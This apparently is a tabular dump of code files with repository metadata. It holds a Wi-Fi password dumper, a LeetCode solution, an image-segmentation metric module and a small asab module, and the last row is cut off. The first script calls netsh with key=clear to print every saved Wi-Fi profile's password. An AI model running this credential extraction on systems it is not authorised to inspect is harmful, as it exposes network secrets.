hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e57c0b31f4195a26edf8f9247751452b0807e246 | 1,709 | py | Python | wifi.py | 4yub1k/Python-Wifi-Password | 913d39fe532c566f96aa3605191d142bea759498 | [
"MIT"
] | null | null | null | wifi.py | 4yub1k/Python-Wifi-Password | 913d39fe532c566f96aa3605191d142bea759498 | [
"MIT"
] | null | null | null | wifi.py | 4yub1k/Python-Wifi-Password | 913d39fe532c566f96aa3605191d142bea759498 | [
"MIT"
] | null | null | null | #@ayuboid --- salahuddin[@]protonmail.ch/com
import subprocess
class t:
def user(self):
x_1=subprocess.Popen("netsh wlan show profiles",stdout=subprocess.PIPE) #run IDE as admin
stdout=x_1.communicate()[0]
return stdout
def password_1(self,name):
for pswd in name:
#remove spaces from both sides [pswd[1].strip()]
x_1=subprocess.Popen(r'netsh wlan show profiles name="%s" key=clear' %pswd[1].strip(),stdout=subprocess.PIPE) #run IDE as admin
#-----> Important NOTe:if there are spaces between the values then send raw strings FORMAT[r'"<type>"' %<variable>]
#----->Make sure remove unwanted space in names
#communicate() method is used to get the output from pipe
stdout=x_1.communicate()[0]
stdout=stdout.decode().splitlines()
for line in stdout:
if "Key Content" in line:
print("Username : %s\nPassword : %s " % (pswd[1],line.split(":")[1]))
class t1(t):
def username(self):
x_1=self.user()
name_list=[]
#Decode (binary to utf8) and then split it by lines
x_1=x_1.decode().splitlines()
#Extract the string from list
for l in x_1:
#Check For the string in given line
if "All User Profile" in l:
#Split the current line from : e-g test : OK -----> ['test','OK'] and append to list
name_list.append(l.split(":"))
return name_list
def password(self):
name_list=self.username()
name=self.password_1(name_list)
b=t1()
b.password()
#print(b.username()) GET USERNAMES
#You can also use os.system
| 39.744186 | 139 | 0.591574 | 238 | 1,709 | 4.184874 | 0.445378 | 0.016064 | 0.012048 | 0.034137 | 0.106426 | 0.066265 | 0.066265 | 0 | 0 | 0 | 0 | 0.015523 | 0.283792 | 1,709 | 42 | 140 | 40.690476 | 0.798203 | 0.346401 | 0 | 0.071429 | 0 | 0 | 0.11413 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0.178571 | 0.035714 | 0 | 0.321429 | 0.035714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
e58014cfc6228afdc63430dc2ea3095af62a76a8 | 760 | py | Python | Dataset/Leetcode/test/53/155.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/test/53/155.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/test/53/155.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | class Solution(object):
def XXX(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
def maxSub(arr,lo,hi):
if lo == hi:return arr[lo]
mid = (lo+hi) // 2
# 左最大
left = maxSub(arr,lo,mid)
# 右最大
right = maxSub(arr,mid+1,hi)
# 中间最大
leftMid,rightMid = float("-inf"),float("-inf")
tempL,tempR = 0,0
for i in range(mid,lo-1,-1):
tempL += arr[i]
leftMid = max(leftMid,tempL)
for i in range(mid+1,hi+1):
tempR += arr[i]
rightMid = max(rightMid,tempR)
return max(left,right,leftMid+rightMid)
return maxSub(nums,0,len(nums)-1)
| 28.148148 | 56 | 0.455263 | 95 | 760 | 3.642105 | 0.4 | 0.078035 | 0.063584 | 0.063584 | 0.080925 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022124 | 0.405263 | 760 | 26 | 57 | 29.230769 | 0.743363 | 0.061842 | 0 | 0 | 0 | 0 | 0.011799 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0 | 0 | 0.294118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e580b0c306509aee55a5e30612158ccd86541db3 | 23,831 | py | Python | cal_metric.py | BMEngineeR/single_cell_spatial_image | 72676556218605907085a81847cb640a0bc460ea | [
"MIT"
] | 5 | 2021-04-29T12:45:42.000Z | 2021-11-06T23:22:07.000Z | cal_metric.py | OSU-BMBL/single_cell_spatial_image | 61db0da133787885e9f5f7ecc977df0620b62ad7 | [
"MIT"
] | 6 | 2021-02-26T12:36:06.000Z | 2022-02-26T11:44:05.000Z | cal_metric.py | BMEngineeR/single_cell_spatial_image | 72676556218605907085a81847cb640a0bc460ea | [
"MIT"
] | 6 | 2021-04-20T14:01:14.000Z | 2021-11-18T20:18:38.000Z | import os.path as osp
import pickle
import shutil
import tempfile
import os
import mmcv
import numpy as np
import torch
import torch.distributed as dist
from mmcv.image import tensor2imgs
from mmcv.runner import get_dist_info
import pandas as pd
import json
import cv2
from PIL import Image
from sklearn.metrics.cluster import adjusted_rand_score
import shutil
from sklearn.metrics.cluster import adjusted_rand_score, adjusted_mutual_info_score, fowlkes_mallows_score, rand_score, \
silhouette_score, calinski_harabasz_score, davies_bouldin_score
import math
from mmseg.apis.inference import inference_segmentor
from mmseg.apis.inference import init_segmentor
def testing_metric(img_path, output_folder, model, show_dir, k):
MI_list = []
name_list = []
k_list = []
if k==-1:
for name in os.listdir(img_path):
MI_max = 0
img_name = img_path+name
result = inference_segmentor(model, img_name, k)
out_file=show_dir+name
image_test = cv2.imread(img_name)
MI = cluster_heterogeneity(image_test, result[0], 0)
if MI_max < MI:
MI_max = MI
optimal_name = name
for tmp_k in range(4, 10):
MI_max = 0
img_name = img_path+optimal_name
result = inference_segmentor(model, img_name, tmp_k)
out_file=show_dir+name
model.show_result(
img_name,
result,
palette=None,
show=False,
out_file=out_file)
image_test = cv2.imread(img_name)
if not os.path.exists(output_folder+'result_temp/'):
os.makedirs(output_folder+'result_temp/')
np.savetxt(output_folder+'result_temp/'+name.split('.png')[0]+'.csv', result[0], delimiter=',')
MI = cluster_heterogeneity(image_test, result[0], 0)
if MI_max < MI:
MI_max = MI
optimal_k = tmp_k
result = inference_segmentor(model, img_name, optimal_k)
model.show_result(
img_name,
result,
palette=None,
show=False,
out_file=out_file)
k_list.append(optimal_k)
name_list.append(optimal_name)
MI_list.append(MI_max)
MI_result = {
'name': name_list,
'k':k_list,
'MI': MI_list,
}
MI_result = pd.DataFrame(MI_result)
MI_result = MI_result.sort_values(by=['MI'], ascending=False)
if len(name_list) > 5:
MI_result_top5 = MI_result[0:5]
name = MI_result_top5.iloc[:, 0].values
for n in name:
prefix = n.split('.png')[0]
show = cv2.imread(show_dir + n)
if not os.path.exists(output_folder + 'segmentation_map/'):
os.makedirs(output_folder + 'segmentation_map/')
cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
if not os.path.exists(output_folder+'result/'):
os.makedirs(output_folder+'result/')
shutil.move(output_folder+'result_temp/'+prefix+'.csv', output_folder+'result/'+prefix+'.csv')
# shutil.rmtree(show_dir)
# shutil.rmtree(output_folder+'result_temp/')
MI_result_top5.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
else:
name = MI_result.iloc[:, 0].values
for n in name:
prefix = n.split('.png')[0]
show = cv2.imread(show_dir + n)
if not os.path.exists(output_folder + 'segmentation_map/'):
os.makedirs(output_folder + 'segmentation_map/')
cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
if not os.path.exists(output_folder + 'result/'):
os.makedirs(output_folder + 'result/')
shutil.move(output_folder + 'result_temp/' + prefix + '.csv', output_folder + 'result/' + prefix + '.csv')
shutil.rmtree(show_dir)
shutil.rmtree(output_folder + 'result_temp/')
MI_result.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
top1_name = MI_result.iloc[:, 0].values[0]
top1_csv_name = output_folder + 'result/' + top1_name.split('.png')[0] + '.csv'
top1_category_map = np.loadtxt(top1_csv_name,dtype=np.int32, delimiter=",")
else:
for name in os.listdir(img_path):
img_name = img_path+name
name_list.append(name)
result = inference_segmentor(model, img_name, k)
out_file=show_dir+name
print(out_file)
model.show_result(
img_name,
result,
palette=None,
show=False,
out_file=out_file)
image_test = cv2.imread(img_name)
if not os.path.exists(output_folder+'result_temp/'):
os.makedirs(output_folder+'result_temp/')
np.savetxt(output_folder+'result_temp/'+name.split('.png')[0]+'.csv', result[0], delimiter=',')
MI = cluster_heterogeneity(image_test, result[0], 0)
MI_list.append(MI)
MI_result = {
'name': name_list,
'MI': MI_list,
}
MI_result = pd.DataFrame(MI_result)
MI_result = MI_result.sort_values(by=['MI'], ascending=False)
if len(name_list) > 5:
MI_result_top5 = MI_result[0:5]
# print(MI_result_top5)
name = MI_result_top5.iloc[:, 0].values
for n in name:
prefix = n.split('.png')[0]
show = cv2.imread(show_dir + n)
if not os.path.exists(output_folder + 'segmentation_map/'):
os.makedirs(output_folder + 'segmentation_map/')
cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
if not os.path.exists(output_folder+'result/'):
os.makedirs(output_folder+'result/')
shutil.move(output_folder+'result_temp/'+prefix+'.csv', output_folder+'result/'+prefix+'.csv')
# shutil.rmtree(show_dir)
# shutil.rmtree(output_folder+'result_temp/')
MI_result_top5.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
else:
name = MI_result.iloc[:, 0].values
for n in name:
prefix = n.split('.png')[0]
show = cv2.imread(show_dir + n)
if not os.path.exists(output_folder + 'segmentation_map/'):
os.makedirs(output_folder + 'segmentation_map/')
cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
if not os.path.exists(output_folder + 'result/'):
os.makedirs(output_folder + 'result/')
shutil.move(output_folder + 'result_temp/' + prefix + '.csv', output_folder + 'result/' + prefix + '.csv')
shutil.rmtree(show_dir)
shutil.rmtree(output_folder + 'result_temp/')
MI_result.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
top1_name = MI_result.iloc[:, 0].values[0]
top1_csv_name = output_folder + 'result/' + top1_name.split('.png')[0] + '.csv'
top1_category_map = np.loadtxt(top1_csv_name,dtype=np.int32, delimiter=",")
# shutil.rmtree(output_folder + 'result/')
return top1_category_map
def evaluation_metric(adata, img_path, output_folder, model, show_dir, label_path, k):
MI_list = []
name_list = []
ARI_list = []
AMI_list = []
FMI_list = []
RI_list = []
k_list = []
if k == -1:
for name in os.listdir(img_path):
MI_max = 0
img_name = img_path+name
result = inference_segmentor(model, img_name, k)
out_file=show_dir+name
image_test = cv2.imread(img_name)
MI = cluster_heterogeneity(image_test, result[0], 0)
if MI_max < MI:
MI_max = MI
optimal_name = name
for tmp_k in range(4, 10):
MI_max = 0
img_name = img_path+optimal_name
result = inference_segmentor(model, img_name, tmp_k)
out_file=show_dir+name
model.show_result(
img_name,
result,
palette=None,
show=False,
out_file=out_file)
image_test = cv2.imread(img_name)
if not os.path.exists(output_folder+'result_temp/'):
os.makedirs(output_folder+'result_temp/')
np.savetxt(output_folder+'result_temp/'+name.split('.png')[0]+'.csv', result[0], delimiter=',')
MI = cluster_heterogeneity(image_test, result[0], 0)
name0, ARI, AMI, FMI, RI = calculate(adata, result[0], img_name, label_path)
if MI_max < MI:
MI_max = MI
optimal_k = tmp_k
optimal_ARI = ARI
optimal_MI = MI
optimal_AMI = AMI
optimal_FMI = FMI
optimal_RI = RI
result = inference_segmentor(model, img_name, optimal_k)
model.show_result(
img_name,
result,
palette=None,
show=False,
out_file=out_file)
k_list.append(optimal_k)
name_list.append(optimal_name)
MI_list.append(optimal_MI)
ARI_list.append(optimal_ARI)
AMI_list.append(optimal_AMI)
FMI_list.append(optimal_FMI)
RI_list.append(optimal_RI)
MI_result = {
'name': name_list,
'k':k_list,
"ARI": ARI_list,
"AMI": AMI_list,
"FMI": FMI_list,
"RI": RI_list,
'MI': MI_list,
}
MI_result = pd.DataFrame(MI_result)
MI_result = MI_result.sort_values(by=['MI'], ascending=False)
if len(name_list) > 5:
MI_result_top5 = MI_result[0:5]
# print(MI_result_top5)
name = MI_result_top5.iloc[:, 0].values
for n in name:
prefix = n.split('.png')[0]
show = cv2.imread(show_dir + n)
if not os.path.exists(output_folder + 'segmentation_map/'):
os.makedirs(output_folder + 'segmentation_map/')
cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
if not os.path.exists(output_folder+'result/'):
os.makedirs(output_folder+'result/')
shutil.move(output_folder+'result_temp/'+prefix+'.csv', output_folder+'result/'+prefix+'.csv')
shutil.rmtree(show_dir)
shutil.rmtree(output_folder+'result_temp/')
MI_result_top5.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
else:
name = MI_result.iloc[:, 0].values
for n in name:
prefix = n.split('.png')[0]
show = cv2.imread(show_dir + n)
if not os.path.exists(output_folder + 'segmentation_map/'):
os.makedirs(output_folder + 'segmentation_map/')
cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
if not os.path.exists(output_folder + 'result/'):
os.makedirs(output_folder + 'result/')
shutil.move(output_folder + 'result_temp/' + prefix + '.csv', output_folder + 'result/' + prefix + '.csv')
shutil.rmtree(show_dir)
shutil.rmtree(output_folder + 'result_temp/')
MI_result.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
top1_name = MI_result.iloc[:, 0].values[0]
top1_csv_name = output_folder + 'result/' + top1_name.split('.png')[0] + '.csv'
top1_category_map = np.loadtxt(top1_csv_name,dtype=np.int32, delimiter=",")
shutil.rmtree(output_folder + 'result/')
else:
for name in os.listdir(img_path):
img_name = img_path+name
name_list.append(name)
result = inference_segmentor(model, img_name, k)
name0, ARI, AMI, FMI, RI = calculate(adata, result[0], img_name, label_path)
ARI_list.append(ARI)
AMI_list.append(AMI)
FMI_list.append(FMI)
RI_list.append(RI)
# print(result[0])
print(img_name)
out_file=show_dir+name
# print(out_file)
model.show_result(
img_name,
result,
palette=None,
show=False,
out_file=out_file)
image_test = cv2.imread(img_name)
if not os.path.exists(output_folder+'result_temp/'):
os.makedirs(output_folder+'result_temp/')
np.savetxt(output_folder+'result_temp/'+name.split('.png')[0]+'.csv', result[0], delimiter=',')
MI = cluster_heterogeneity(image_test, result[0], 0)
MI_list.append(MI)
MI_result = {
'name': name_list,
"ARI": ARI_list,
"AMI": AMI_list,
"FMI": FMI_list,
"RI": RI_list,
'MI': MI_list,
}
MI_result = pd.DataFrame(MI_result)
MI_result = MI_result.sort_values(by=['MI'], ascending=False)
if len(name_list) > 5:
MI_result_top5 = MI_result[0:5]
# print(MI_result_top5)
name = MI_result_top5.iloc[:, 0].values
for n in name:
prefix = n.split('.png')[0]
show = cv2.imread(show_dir + n)
if not os.path.exists(output_folder + 'segmentation_map/'):
os.makedirs(output_folder + 'segmentation_map/')
cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
if not os.path.exists(output_folder+'result/'):
os.makedirs(output_folder+'result/')
shutil.move(output_folder+'result_temp/'+prefix+'.csv', output_folder+'result/'+prefix+'.csv')
shutil.rmtree(show_dir)
shutil.rmtree(output_folder+'result_temp/')
MI_result_top5.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
else:
name = MI_result.iloc[:, 0].values
for n in name:
prefix = n.split('.png')[0]
show = cv2.imread(show_dir + n)
if not os.path.exists(output_folder + 'segmentation_map/'):
os.makedirs(output_folder + 'segmentation_map/')
cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
if not os.path.exists(output_folder + 'result/'):
os.makedirs(output_folder + 'result/')
shutil.move(output_folder + 'result_temp/' + prefix + '.csv', output_folder + 'result/' + prefix + '.csv')
shutil.rmtree(show_dir)
shutil.rmtree(output_folder + 'result_temp/')
MI_result.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
top1_name = MI_result.iloc[:, 0].values[0]
top1_csv_name = output_folder + 'result/' + top1_name.split('.png')[0] + '.csv'
top1_category_map = np.loadtxt(top1_csv_name,dtype=np.int32, delimiter=",")
shutil.rmtree(output_folder + 'result/')
return top1_category_map
def cluster_heterogeneity(image_test, category_map, background_category):
if len(category_map.shape) > 2:
category_map = cv2.cvtColor(category_map, cv2.COLOR_BGR2GRAY)
category_list = np.unique(category_map)
W = np.zeros((len(category_list), len(category_list)))
for i in range(category_map.shape[0]):
flag1 = category_map[i][0]
flag2 = category_map[0][i]
for j in range(category_map.shape[0]):
if category_map[i][j] != flag1: # for row
index1 = np.where(category_list == flag1)[0][0]
index2 = np.where(category_list == category_map[i][j])[0][0]
W[index1][index2] = 1
W[index2][index1] = 1
flag1 = category_map[i][j]
if category_map[j][i] != flag2: # for column
index1 = np.where(category_list == flag2)[0][0]
index2 = np.where(category_list == category_map[j][i])[0][0]
W[index1][index2] = 1
W[index2][index1] = 1
flag2 = category_map[j][i]
W = W[1:, 1:] #
# print(W)
category_num = W.shape[0]
# print(R.shape)
MI_list = []
image_test_ori = image_test
# Calculate the average color value of each channel in each cluster
for channel in range(3):
image_test = image_test_ori[:, :, channel]
# print(image_test)
num = 0
gray_list = []
gray_mean = 0
for category in category_list:
pixel_x, pixel_y = np.where(category_map == category)
if category == background_category:
num = len(pixel_x)
continue
gray = []
for i in range(len(pixel_x)):
gray.append(image_test[pixel_x[i], pixel_y[i]])
gray_value = np.mean(gray)
gray_list.append(gray_value)
gray_mean += gray_value * len(pixel_x)
gray_mean = gray_mean / (image_test.shape[0] ** 2 - num)
n = W.shape[0]
a = 0
b = 0
for p in range(n):
index, = np.where(W[p] == 1)
for q in range(len(index)):
a += abs((gray_list[p] - gray_mean) * (gray_list[index[q]] - gray_mean))
b += (gray_list[p] - gray_mean) ** 2
MI = n * a / (b * np.sum(W))
MI_list.append(MI)
# print(MI_list)
MI = math.sqrt((MI_list[0] ** 2 + MI_list[1] ** 2 + MI_list[2] ** 2) / 3)
# print(MI)
return MI
def calculate(adata, output, img_path, label_path):
img_name = img_path.split('/')[-1] # eg:151507_50_32_....png
samples_num = img_name.split('_')[0] # eg:151507
labels = save_spot_RGB_to_image(label_path, adata) # label
label = labels.flatten().tolist()
output = np.array(output).flatten().tolist()
# print('len(output)',len(output))
label_final = []
output_final = []
shape = adata.uns["img_shape"]
for i in range(shape ** 2):
if label[i] != 0:
label_final.append(label[i])
output_final.append(output[i])
ARI = adjusted_rand_score(label_final, output_final)
AMI = adjusted_mutual_info_score(label_final, output_final)
FMI = fowlkes_mallows_score(label_final, output_final)
RI = rand_score(label_final, output_final)
print('name', img_name)
print('ARI:', ARI)
return img_name, ARI, AMI, FMI, RI
def save_spot_RGB_to_image(label_path, adata):
# data_file = os.path.join(data_folder, expression_file)
X = pd.read_csv(label_path)
X = X.sort_values(by=['barcode'])
# print(X)
# print(adata.obs)
assert all(adata.obs.index == X.iloc[:, 0].values)
layers = X.iloc[:, 1].values
# print(layers)
spot_row = adata.obs["pxl_col_in_fullres"]
spot_col = adata.obs["pxl_row_in_fullres"]
radius = int(0.5 * adata.uns['fiducial_diameter_fullres'] + 1)
# radius = int(scaler['spot_diameter_fullres'] + 1)
max_row = max_col = int((2000 / adata.uns['tissue_hires_scalef']) + 1)
# radius = round(radius * (600 / 2000))
# max_row = np.max(spot_row)
# max_col = np.max(spot_col)
img = np.zeros(shape=(max_row + 1, max_col + 1), dtype=np.int)
img = img.astype(np.uint8)
for index in range(len(layers)):
if layers[index] == 'Layer1':
# print('layer1')
# img[spot_row[index], spot_col[index]] = [0,0,255]
img[(spot_row[index] - radius):(spot_row[index] + radius),
(spot_col[index] - radius):(spot_col[index] + radius)] = 1
# print(img[spot_row[index],spot_col[index]])
# cv2.circle(img,(spot_row[index], spot_col[index]),radius,(0,0,255),thickness=-1)
elif layers[index] == 'Layer2':
img[(spot_row[index] - radius):(spot_row[index] + radius),
(spot_col[index] - radius):(spot_col[index] + radius)] = 2
# img[spot_row[index], spot_col[index]] = [0,255,0]
# cv2.circle(img,(spot_row[index], spot_col[index]),radius,(0,255,0),thickness=-1)
# print(img[spot_row[index],spot_col[index]])
elif layers[index] == 'Layer3':
img[(spot_row[index] - radius):(spot_row[index] + radius),
(spot_col[index] - radius):(spot_col[index] + radius)] = 3
# img[spot_row[index], spot_col[index]] = [255,0,0]
# cv2.circle(img,(spot_row[index], spot_col[index]),radius,(255,0,0),thickness=-1)
elif layers[index] == 'Layer4':
img[(spot_row[index] - radius):(spot_row[index] + radius),
(spot_col[index] - radius):(spot_col[index] + radius)] = 4
# img[spot_row[index], spot_col[index]] = [255,0,255]
# cv2.circle(img,(spot_row[index], spot_col[index]),radius,(255,0,255),thickness=-1)
elif layers[index] == 'Layer5':
img[(spot_row[index] - radius):(spot_row[index] + radius),
(spot_col[index] - radius):(spot_col[index] + radius)] = 5
# img[spot_row[index], spot_col[index]] = [0,255,255]
# cv2.circle(img,(spot_row[index], spot_col[index]),radius,(0,255,255),thickness=-1)
elif layers[index] == 'Layer6':
img[(spot_row[index] - radius):(spot_row[index] + radius),
(spot_col[index] - radius):(spot_col[index] + radius)] = 6
# img[spot_row[index], spot_col[index]] = [255,255,0]
# cv2.circle(img,(spot_row[index], spot_col[index]),radius,(255,255,0),thickness=-1)
elif layers[index] == 'WM':
img[(spot_row[index] - radius):(spot_row[index] + radius),
(spot_col[index] - radius):(spot_col[index] + radius)] = 7
# img[spot_row[index], spot_col[index]] = [0,0,0]
# cv2.circle(img,(spot_row[index], spot_col[index]),radius,(0,0,0),thickness=-1)
shape = adata.uns["img_shape"]
label_img = cv2.resize(img, dsize=(shape, shape), interpolation=cv2.INTER_NEAREST)
return label_img
| 43.329091 | 123 | 0.537745 | 2,868 | 23,831 | 4.22106 | 0.078103 | 0.092186 | 0.087725 | 0.050884 | 0.771849 | 0.748885 | 0.733355 | 0.723608 | 0.704279 | 0.677928 | 0 | 0.023089 | 0.340271 | 23,831 | 549 | 124 | 43.408015 | 0.746915 | 0.074105 | 0 | 0.676538 | 0 | 0 | 0.067219 | 0.001165 | 0 | 0 | 0 | 0 | 0.002278 | 1 | 0.01139 | false | 0 | 0.047836 | 0 | 0.070615 | 0.009112 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 5 |
e58484894c5f43692fe7341a176dcb84807da1d8 | 467 | py | Python | asab/proactor/__init__.py | TeskaLabs/asab | f28894b62bad192d8d30df01a8ad1b842ee2a2fb | [
"BSD-3-Clause"
] | 23 | 2018-03-07T18:58:13.000Z | 2022-03-29T17:11:47.000Z | asab/proactor/__init__.py | TeskaLabs/asab | f28894b62bad192d8d30df01a8ad1b842ee2a2fb | [
"BSD-3-Clause"
] | 87 | 2018-04-04T19:44:13.000Z | 2022-03-31T11:18:00.000Z | asab/proactor/__init__.py | TeskaLabs/asab | f28894b62bad192d8d30df01a8ad1b842ee2a2fb | [
"BSD-3-Clause"
] | 10 | 2018-04-30T16:40:25.000Z | 2022-03-09T10:55:24.000Z | import logging
import asab
from .service import ProactorService
#
L = logging.getLogger(__name__)
#
asab.Config.add_defaults(
{
'asab:proactor': {
'max_workers': '0',
'default_executor': True,
}
}
)
class Module(asab.Module):
'''
Proactor pattern based on loop.run_in_executor()
https://en.wikipedia.org/wiki/Proactor_pattern
'''
def __init__(self, app):
super().__init__(app)
self.service = ProactorService(app, "asab.ProactorService")
| 14.59375 | 61 | 0.704497 | 56 | 467 | 5.553571 | 0.660714 | 0.096463 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002532 | 0.154176 | 467 | 31 | 62 | 15.064516 | 0.78481 | 0.205567 | 0 | 0 | 0 | 0 | 0.170391 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.1875 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5851888f1c433217aef830313dc07ac613ce867 | 13,266 | py | Python | mywebsite/shop/views.py | Zadigo/ecommerce_template | a4572c3faeaeb9cd399351c0fd1f19a4ef94de27 | [
"MIT"
] | 16 | 2020-07-01T03:42:40.000Z | 2022-02-21T21:02:27.000Z | mywebsite/shop/views.py | Zadigo/ecommerce_template | a4572c3faeaeb9cd399351c0fd1f19a4ef94de27 | [
"MIT"
